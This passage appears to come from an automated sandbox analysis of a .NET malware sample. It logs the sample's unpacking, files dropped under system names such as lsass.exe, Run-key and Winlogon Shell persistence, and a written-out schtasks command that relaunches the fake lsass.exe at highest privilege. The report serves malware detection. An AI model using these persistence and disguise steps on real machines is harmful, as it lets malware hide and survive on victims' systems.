                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: uxtheme.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: wldp.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: amsi.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: userenv.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: profapi.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: windows.storage.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: cryptsp.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: rsaenh.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: cryptbase.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: sspicli.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: mscoree.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: kernel.appcore.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: version.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: uxtheme.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: wldp.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: amsi.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: userenv.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: profapi.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: windows.storage.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: cryptsp.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: rsaenh.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: cryptbase.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: mscoree.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: kernel.appcore.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: version.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: uxtheme.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: wldp.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: amsi.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: userenv.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: profapi.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: windows.storage.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: cryptsp.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: rsaenh.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: cryptbase.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: sspicli.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: ktmw32.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: rasapi32.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: rasman.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: rtutils.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: mswsock.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: winhttp.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: iphlpapi.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: dnsapi.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: winnsi.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: rasadhlp.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: fwpuclnt.dll
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeSection loaded: mscoree.dll
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeSection loaded: kernel.appcore.dll
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeSection loaded: version.dll
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeSection loaded: uxtheme.dll
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeSection loaded: wldp.dll
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeSection loaded: amsi.dll
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeSection loaded: userenv.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeDirectory created: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeDirectory created: C:\Program Files\Windows Multimedia Platform\9e60a5f7a3bd80Jump to behavior
                    Source: JNKHlxGvw4.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: JNKHlxGvw4.exeStatic file information: File size 1560958 > 1048576
                    Source: JNKHlxGvw4.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\eaiouozr\eaiouozr.pdb source: JNKHlxGvw4.exe, 00000000.00000002.1832050899.0000000002A09000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: JNKHlxGvw4.exe, _.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                    Source: lsass.exe.0.dr, _.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                    Source: USZqVcJFLA.exe.0.dr, _.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                    Source: RuntimeBroker.exe.0.dr, _.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                    Source: SystemSettings.exe.0.dr, _.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eaiouozr\eaiouozr.cmdline"
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eaiouozr\eaiouozr.cmdline"Jump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeCode function: 0_2_00007FFD9B856FEA push E9000000h; retf 0_2_00007FFD9B857009
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeCode function: 0_2_00007FFD9B855C63 pushad ; ret 0_2_00007FFD9B855C75
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeCode function: 0_2_00007FFD9B8500BD pushad ; iretd 0_2_00007FFD9B8500C1
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeCode function: 0_2_00007FFD9BC43FCC push ebx; ret 0_2_00007FFD9BC4464A
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeCode function: 0_2_00007FFD9BC442D0 push ebx; ret 0_2_00007FFD9BC4464A
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeCode function: 0_2_00007FFD9BC449A9 push ebp; ret 0_2_00007FFD9BC449AA
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeCode function: 0_2_00007FFD9BC448F9 push ebp; ret 0_2_00007FFD9BC4490A
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeCode function: 0_2_00007FFD9BC4B0BE push edi; ret 0_2_00007FFD9BC4B0C6
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeCode function: 0_2_00007FFD9BC4BE1E push edi; ret 0_2_00007FFD9BC4BE33
                    Source: C:\Recovery\USZqVcJFLA.exeCode function: 53_2_00007FFD9B896FEA push E9000000h; retf 53_2_00007FFD9B897009
                    Source: C:\Recovery\USZqVcJFLA.exeCode function: 53_2_00007FFD9B895C63 pushad ; ret 53_2_00007FFD9B895C75
                    Source: C:\Recovery\USZqVcJFLA.exeCode function: 53_2_00007FFD9BC8C01F push ebp; ret 53_2_00007FFD9BC8C020
                    Source: C:\Recovery\USZqVcJFLA.exeCode function: 53_2_00007FFD9BC88C08 push es; ret 53_2_00007FFD9BC88C09
                    Source: C:\Recovery\USZqVcJFLA.exeCode function: 53_2_00007FFD9BC87BB0 pushfd ; ret 53_2_00007FFD9BC87BC0
                    Source: C:\Recovery\USZqVcJFLA.exeCode function: 53_2_00007FFD9BC8774C push ds; ret 53_2_00007FFD9BC8774F
                    Source: C:\Recovery\USZqVcJFLA.exeCode function: 53_2_00007FFD9BC8AF14 pushad ; ret 53_2_00007FFD9BC8AF1C
                    Source: C:\Recovery\USZqVcJFLA.exeCode function: 53_2_00007FFD9BC8BE60 push ebx; ret 53_2_00007FFD9BC8BE61
                    Source: C:\Recovery\USZqVcJFLA.exeCode function: 53_2_00007FFD9BC8BE92 push edx; ret 53_2_00007FFD9BC8BE93
                    Source: C:\Recovery\USZqVcJFLA.exeCode function: 53_2_00007FFD9BC8BD74 push esp; ret 53_2_00007FFD9BC8BD75
                    Source: C:\Recovery\USZqVcJFLA.exeCode function: 53_2_00007FFD9BC8BD05 push esp; ret 53_2_00007FFD9BC8BD06
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeCode function: 54_2_00007FFD9B866FEA push E9000000h; retf 54_2_00007FFD9B867009
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeCode function: 54_2_00007FFD9B865C63 pushad ; ret 54_2_00007FFD9B865C75
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeCode function: 54_2_00007FFD9B8600BD pushad ; iretd 54_2_00007FFD9B8600C1
                    Source: C:\Recovery\USZqVcJFLA.exeCode function: 55_2_00007FFD9B875921 pushad ; retf 55_2_00007FFD9B87592D
                    Source: C:\Recovery\USZqVcJFLA.exeCode function: 55_2_00007FFD9B878C6E push ds; retf 55_2_00007FFD9B878C71
                    Source: C:\Recovery\USZqVcJFLA.exeCode function: 55_2_00007FFD9B878C76 push es; retf 55_2_00007FFD9B878C89
                    Source: C:\Recovery\USZqVcJFLA.exeCode function: 55_2_00007FFD9B866FEA push E9000000h; retf 55_2_00007FFD9B867009
                    Source: C:\Recovery\USZqVcJFLA.exeCode function: 55_2_00007FFD9B865C63 pushad ; ret 55_2_00007FFD9B865C75
                    Source: C:\Recovery\USZqVcJFLA.exeCode function: 55_2_00007FFD9B8600BD pushad ; iretd 55_2_00007FFD9B8600C1
                    Source: 0.2.JNKHlxGvw4.exe.1ad80000.6.raw.unpack, COBCbYgFOBBqPH8A72G.csHigh entropy of concatenated method names: 'KZ3', 'imethod_0', 'L3I', 'I28NqZ5PyvM', 'q3JNgNUhB4d', 's2EPQdNr3gKiKSNcsarg', 'nbu1IjNrHa2SbtHIbcSI', 'UHaC3nNr0n557S7PWZVo', 'y9B8EsNr1eXQyn3B8exT', 'uKAOR7NrffGAluuQ6gQ6'

                    Persistence and Installation Behavior

                    barindex
                    Creates processes via WMI
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Drops PE files with benign system names
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeFile created: C:\Users\user\Favorites\lsass.exeJump to dropped file
                    Infects executable files (exe, dll, sys, html)
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeFile created: C:\Users\user\Desktop\uhdUZoxx.logJump to dropped file
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeFile created: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeJump to dropped file
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeFile created: C:\Recovery\USZqVcJFLA.exeJump to dropped file
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeFile created: C:\Users\user\Favorites\lsass.exeJump to dropped file
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeFile created: C:\Users\user\Desktop\AsBtWtog.logJump to dropped file
                    Source: C:\Recovery\USZqVcJFLA.exeFile created: C:\Users\user\Desktop\EDQjSEMY.logJump to dropped file
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeFile created: C:\Users\user\Desktop\vnccfbfp.logJump to dropped file
                    Source: C:\Recovery\USZqVcJFLA.exeFile created: C:\Users\user\Desktop\bSdYXpxm.logJump to dropped file
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeFile created: C:\Users\user\Desktop\RzSYqgUu.logJump to dropped file
                    Source: C:\Recovery\USZqVcJFLA.exeFile created: C:\Users\user\Desktop\oBKeyAWK.logJump to dropped file
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeFile created: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeJump to dropped file
                    Source: C:\Recovery\USZqVcJFLA.exeFile created: C:\Users\user\Desktop\OljzCgRG.logJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeFile created: C:\Users\user\Desktop\uhdUZoxx.logJump to dropped file
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeFile created: C:\Users\user\Desktop\vnccfbfp.logJump to dropped file
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeFile created: C:\Users\user\Desktop\RzSYqgUu.logJump to dropped file
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeFile created: C:\Users\user\Desktop\AsBtWtog.logJump to dropped file
                    Source: C:\Recovery\USZqVcJFLA.exeFile created: C:\Users\user\Desktop\bSdYXpxm.logJump to dropped file
                    Source: C:\Recovery\USZqVcJFLA.exeFile created: C:\Users\user\Desktop\OljzCgRG.logJump to dropped file
                    Source: C:\Recovery\USZqVcJFLA.exeFile created: C:\Users\user\Desktop\EDQjSEMY.logJump to dropped file
                    Source: C:\Recovery\USZqVcJFLA.exeFile created: C:\Users\user\Desktop\oBKeyAWK.logJump to dropped file

                    Boot Survival

                    barindex
                    Creates an undocumented autostart registry key
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                    Creates multiple autostart registry keys
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run USZqVcJFLAJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SystemSettingsJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JNKHlxGvw4Jump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lsassJump to behavior
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\Users\user\Favorites\lsass.exe'" /rl HIGHEST /f
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run USZqVcJFLAJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run USZqVcJFLAJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run USZqVcJFLAJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run USZqVcJFLAJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lsassJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lsassJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SystemSettingsJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SystemSettingsJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JNKHlxGvw4Jump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JNKHlxGvw4Jump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JNKHlxGvw4Jump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JNKHlxGvw4Jump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
